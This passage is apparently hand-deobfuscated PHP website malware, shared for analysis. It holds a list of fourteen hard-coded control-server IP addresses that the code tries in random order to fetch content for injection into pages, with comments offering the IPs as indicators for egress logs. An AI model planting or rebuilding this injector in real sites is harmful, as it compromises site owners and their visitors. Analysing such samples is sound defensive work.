// value mod_con() inserts into the page.
if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);
return true;
}
else {
return false;
}
}
// Hard-coded control-server addresses, tried in random order until one replies
// with content to inject. Useful as indicators when reviewing egress logs.
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
break ;
}
}
}
Unpacked by hand so it's more readable :)
